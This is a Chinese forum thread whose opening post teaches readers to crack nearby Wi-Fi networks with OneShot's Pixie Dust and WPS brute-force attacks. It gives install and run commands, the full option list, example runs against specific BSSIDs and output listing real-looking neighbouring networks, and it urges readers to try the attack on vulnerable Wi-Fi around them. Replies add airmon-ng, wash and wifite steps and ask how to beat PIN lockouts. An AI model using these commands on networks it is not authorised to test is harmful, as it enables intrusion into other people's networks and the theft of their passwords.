仙尘PIN秒破WiFi教学
概述OneShot执行Pixie Dust攻击,而无需切换到监控模式。特征[*]小精灵尘埃攻击;
[*]集成 3WiFi 离线 WPS PIN 生成器;
[*]在线WPS蛮力;
[*]Wi-Fi扫描仪,具有基于iw的突出显示功能;
要求
[*]python 3.6 及以上版本;
[*]Wpa supplicant;
[*]Pixiewps;
[*]iw。
设置Debian/Ubuntu/kali安装依赖sudo apt install -y python3 wpasupplicant iw wget
安装小精灵Ubuntu 18.04 及更高版本或 Debian 10 及更高版本sudo apt install -y pixiewps
获取OneShotgit clone --depth 1 https://github.com/drygdryg/OneShot OneShot
运行sudo python OneShot/oneshot.py -i wlan0 --iface-down -K
用法
oneshot.py <arguments>
Required arguments:
-i, --interface=<wlan0>: Name of the interface to use
Optional arguments:
-b, --bssid=<mac> : BSSID of the target AP
-p, --pin=<wps pin> : Use the specified pin (arbitrary string or 4/8 digit pin)
-K, --pixie-dust : Run Pixie Dust attack
-B, --bruteforce : Run online bruteforce attack
--push-button-connect : Run WPS push button connection
Advanced arguments:
-d, --delay=<n> : Set the delay between pin attempts
-w, --write : Write AP credentials to the file on success
-F, --pixie-force : Run Pixiewps with --force option (bruteforce full range)
-X, --show-pixie-cmd : Alway print Pixiewps command
--vuln-list=<filename> : Use custom file with vulnerable devices list ['vulnwsc.txt']
--iface-down : Down network interface when the work is finished
-l, --loop : Run in a loop
-r, --reverse-scan : Reverse order of networks in the list of networks. Useful on small displays
--mtk-wifi : Activate MediaTek Wi-Fi interface driver on startup and deactivate it on exit
(for internal Wi-Fi adapters implemented in MediaTek SoCs). Turn off Wi-Fi in the system settings before using this.
-v, --verbose : Verbose output
使用示例在指定的BSSID上启动小精灵尘埃攻击:sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -K
显示可用网络并在指定网络上启动 Pixie Dust 攻击:sudo python3 oneshot.py -i wlan0 -K
使用指定的PIN的前半部分启动在线WPS暴力破解:sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234
启动WPS按钮连接:ssudo python3 oneshot.py -i wlan0 --pbc
使用效果
# 执行仙尘攻击
╰─ sudo python oneshot.py -i wlan0 --iface-down -K
[*] Running wpa_supplicant…
[*] BSSID not specified (--bssid) — scanning for available networks
Network marks: Possibly vulnerable | WPS locked | Already stored
Networks list:
# BSSID ESSID Sec. PWRWSC device name WSC model
1) 4A:F8:FF:73:7F:89 WPA2 -76
2) 58:BE:72:1C:0F:A8CU_S5wj WPA/WPA2 -76
3) 48:F8:FF:53:7F:89CMCC-9cmM WPA2 -80RalinkAPS_0 Ralink Wireless Access Point RT2860
4) 4A:F8:FF:33:7F:89CMCC-QLINK Open -82
5) E8:D7:65:B2:8C:1CCU_Fe63_5G WPA/WPA2 -83huawei_ONT WAP 123
6) 94:F8:27:7A:EC:92ChinaNet-EC8E WPA/WPA2 -84
7) 14:89:CB:16:B2:A4CU_Fe63_5G WPA/WPA2 -84huawei_ONT WAP 123
8) 70:42:D3:56:40:92CMCC-ppSG WPA2 -86
9) 4A:F8:FF:13:7F:89CMCC-GUIDE-LINK WPA2 -87RalinkAPS_1 Ralink Wireless Access Point RT2860
破解一个WiFi只需要0.89秒,如果你周围存在这种易受攻击的WiFi,试试仙尘攻击吧!!!!!绿色表示易受攻击选择目标9,回车
破解完毕,wpa-psk为密码,wps-pin为PIN码!!!
本帖最后由 xun73tian 于 2023-8-12 14:34 编辑
vanke 发表于 2023-8-12 09:58
怎么用的 命令怎么用我是直接输入命令wifite 让他自动的pin不出来
有的能出,有的不能出。对方路由器的wps为1.0版本的,几乎都能获取到pin码。wps为2.0版本的很难,并且有上锁功能。
使用wifite时,先扫描一下wps版本。
systemctl stop NetworkManager (关闭网络管理功能)
airmon-ng check kill
wash -i wlan0 (简便扫描开启wps的AP)
记住1.0版本wps的路由器
wifite -i wlan0(使用wifite扫描wps功能的路由器)
选择1.0版本的路由器进行pin码尝试。
看不懂 能简单一点吗?有没有教学视频? 这还是用以前的PIN方式; 好像没变 本帖最后由 东西方不败 于 2023-8-3 12:52 编辑
试试看 好像很厉害,可惜不会 试过了 周边的无线都不支持 只有少数路由器wifi芯片才能用这个方式破解 那种300s防pin的咋pin? 无线爱好者66 发表于 2023-8-7 12:48
那种300s防pin的咋pin?
是的,那将可以。但你必须跳由我指定的特殊舞蹈 看不懂啊是 实验了一下,没有wifite2-2.5.8-b好用!wifite2-2.5.8-b能出pin码的,小精灵尘埃出不了! 克隆出错了